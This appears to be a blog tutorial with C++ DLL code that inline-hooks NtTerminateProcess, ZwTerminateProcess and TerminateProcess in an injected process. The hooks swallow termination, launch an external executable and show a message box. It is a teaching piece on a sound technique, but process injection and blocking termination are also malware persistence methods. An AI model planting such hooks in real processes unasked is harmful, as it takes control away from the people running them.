API hooking: detecting an attempt to shut the application down from the desktop.

 

In this tutorial I will refer to the articles >> Inline Hooking << and >> IAT Hooking <<.



The pseudo-algorithm is as follows:
   -- We select (or write) the target executable whose process will be hooked.
   -- We write a library (DLL) that intercepts the process-termination APIs, so that a request to end the program is caught instead of carried out. (Note: the listing below patches the first bytes of each exported function with a JMP — an inline hook — rather than swapping an IAT entry.)
   -- We write an injector that loads the library into that executable's process.

The injector, and the library that gets loaded into the target process, were described in the articles above.

In this article we modify the library so that it hooks the following functions:
   -> NtTerminateProcess (ntdll.dll)
   -> ZwTerminateProcess (ntdll.dll)
   -> TerminateProcess (kernel32.dll)
Keep the scope in mind: these are entry points inside the hooked process, so only terminations requested from within it (e.g. ExitProcess, or TerminateProcess on its own handle) pass through them. A termination issued by another process — Task Manager's "End process" or a remote TerminateProcess — runs NtTerminateProcess in that other process and never reaches these hooks.

  
#include <windows.h> 
#include <iostream> 
#include "Convert.h"  //https://www.netbot.sk/en/14-blog-headers/86-convert-h-en
#include "WinAPI.h"   //https://www.netbot.sk/en/14-blog-headers/44-winapi-en
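// Installs an inline hook: the first 5 bytes of inputMethod are overwritten with
// a relative JMP (opcode E9 + signed 32-bit displacement) to outputMethod.
//
// The original bytes are NOT saved, so there is no trampoline and the hooked
// function can never be called in its original form again. That is intended
// here (the hook's job is to stop termination, not forward it), but it means
// the hook cannot be removed at runtime.
//
// Returns 1 on success, 0 when:
//   - either pointer is null (a failed GetProcAddress returns NULL; writing to
//     address 0 would crash the host process),
//   - the displacement does not fit in a signed 32-bit rel32 (possible on
//     64-bit builds, where ntdll and this DLL may be more than 2 GiB apart;
//     the original DWORD arithmetic silently truncated it),
//   - the page could not be made writable, or its protection could not be
//     restored afterwards.
DWORD SetHook(LPVOID inputMethod, LPVOID outputMethod) {
    if (inputMethod == nullptr || outputMethod == nullptr) {
        return 0;
    }

    const SIZE_T kPatchSize = 5;  // E9 xx xx xx xx

    // rel32 is relative to the instruction following the 5-byte JMP.
    const LONG_PTR displacement =
        reinterpret_cast<LONG_PTR>(outputMethod)
        - (reinterpret_cast<LONG_PTR>(inputMethod) + static_cast<LONG_PTR>(kPatchSize));
    // Refuse to write a truncated displacement: the JMP would land anywhere.
    if (static_cast<LONG_PTR>(static_cast<LONG>(displacement)) != displacement) {
        return 0;
    }

    DWORD oldProtection = 0;
    if (!::VirtualProtect(inputMethod, kPatchSize, PAGE_EXECUTE_READWRITE, &oldProtection)) {
        return 0;
    }

    BYTE* patch = static_cast<BYTE*>(inputMethod);
    patch[0] = 0xE9;
    const LONG rel32 = static_cast<LONG>(displacement);
    CopyMemory(patch + 1, &rel32, sizeof(rel32));  // byte copy: patch+1 is unaligned

    DWORD ignored = 0;
    const BOOL restored = ::VirtualProtect(inputMethod, kPatchSize, oldProtection, &ignored);

    // The bytes are code: make sure no stale prefetched instructions are executed.
    ::FlushInstructionCache(::GetCurrentProcess(), inputMethod, kPatchSize);

    return restored ? 1 : 0;
}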
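// Replacement body for NtTerminateProcess / ZwTerminateProcess (HANDLE, NTSTATUS)
// and TerminateProcess (HANDLE, UINT).
//
// All three targets are stdcall functions taking two machine-word arguments, so
// a single two-parameter WINAPI function can stand in for each of them. The
// parameter count MUST match the hooked function: on x86 stdcall the callee
// pops its own arguments, so the previous four-parameter (MessageBoxA-shaped)
// signature popped 16 bytes where the caller had pushed 8, corrupting the
// caller's stack on every intercepted call.
//
// SetHook keeps no trampoline, so the original function is never invoked: the
// termination request is swallowed, a helper executable is launched, a message
// box is shown, and control returns to the caller as if the call had completed.
// NOTE(review): every TerminateProcess issued by this process is intercepted,
// including one aimed at a child process — compare GetProcessId(hProcess) with
// GetCurrentProcessId() if only self-termination should be blocked.
//
// Both parameters are unused; they exist only to match the hooked ABI.
NTSTATUS WINAPI HookedCall(HANDLE hProcess, UINT uExitCode) {
    (void)hProcess;
    (void)uExitCode;

    ::Diall_WinApi::WinApi::GetInstance()->ExecuteFile("d:\\prog.exe", "", ::Diall_WinApi::SelfWindow::SHOW);
    MessageBoxA(0, "Terminate was detected !", "Teerminating", MB_OK);

    // 0 is STATUS_SUCCESS for the Nt/Zw callers; a TerminateProcess caller
    // reads the same 0 as FALSE (failure).
    return 0;
}

// Resolves `function` in the already-loaded `module` and redirects it to
// HookedCall. Returns false (and patches nothing) if either lookup fails, so a
// NULL from GetProcAddress is never handed to SetHook.
static bool InstallTerminateHook(const char* module, const char* function) {
    const HMODULE mod = GetModuleHandleA(module);
    if (mod == nullptr) {
        return false;
    }
    const FARPROC target = GetProcAddress(mod, function);
    if (target == nullptr) {
        return false;
    }
    return SetHook(reinterpret_cast<LPVOID>(target), reinterpret_cast<LPVOID>(HookedCall)) != 0;
}

// DLL entry point. When the injector maps this DLL into the target process,
// the three termination hooks are installed. ntdll and kernel32 are always
// loaded before any DllMain runs, so GetModuleHandleA is safe here.
//
// Nt/ZwTerminateProcess may resolve to the same address on some Windows
// versions; patching it twice writes identical bytes and is harmless.
// Nothing is undone on DLL_PROCESS_DETACH: the original bytes were never
// saved, so the patches stay for the life of the process. A failed hook does
// not fail the load (TRUE is always returned), matching the original behaviour.
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved) {
    (void)hInst;
    (void)reserved;

    if (reason == DLL_PROCESS_ATTACH) {
        InstallTerminateHook("ntdll.dll", "NtTerminateProcess");
        InstallTerminateHook("ntdll.dll", "ZwTerminateProcess");
        InstallTerminateHook("kernel32.dll", "TerminateProcess");
    }
    // DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH: nothing to do.
    return TRUE;
}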